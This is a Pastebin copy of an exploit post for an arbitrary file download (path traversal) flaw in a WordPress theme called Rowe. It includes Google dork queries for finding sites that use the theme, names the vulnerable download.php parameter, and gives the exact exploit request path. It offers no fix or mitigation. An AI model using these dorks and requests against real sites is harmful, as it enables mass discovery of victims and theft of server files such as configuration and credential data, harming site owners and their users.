API tools faq
paste
KingSkrupellos

WordPress 4.8.9 Rowe Themes Arbitrary File Download

KingSkrupellos
Mar 18th, 2019
64
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.46 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 4.8.9 Rowe Themes Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/03/2019
  7. # Vendor Homepage : rowesa.co.za ~ knack.digital
  8. knakdigital.com - wordpress.org
  9. # Software Information Link : rowesa.co.za/#design-companies
  10. # Software Affected Version : 4.8.9
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/themes/rowe/''
  15. intext:''Website designed by KNACK DIGITAL"
  16. # Vulnerability Type :
  17. CWE-200 [ Information Exposure ]
  18. CWE-23 [ Relative Path Traversal ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22. # Reference Link : cxsecurity.com/issue/WLB-2019030141
  23.  
  24. ############################################################################################
  25.  
  26. # Impact :
  27. ***********
  28. * WordPress 4.8.9 Rowe Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
  29.  
  30. fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
  31.  
  32. web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
  33.  
  34. of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
  35.  
  36. vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
  37.  
  38. properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
  39.  
  40. ############################################################################################
  41.  
  42. Vulnerable File :
  43. *****************
  44. /download.php
  45.  
  46. Vulnerable Parameter :
  47. ********************
  48. ?download_file=
  49.  
  50. # Arbitrary File Download Exploit :
  51. *******************************
  52. /wp-content/themes/rowe/download/download.php?download_file=[FILENAME]
  53.  
  54. ############################################################################################
  55.  
  56. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  57.  
  58. ############################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!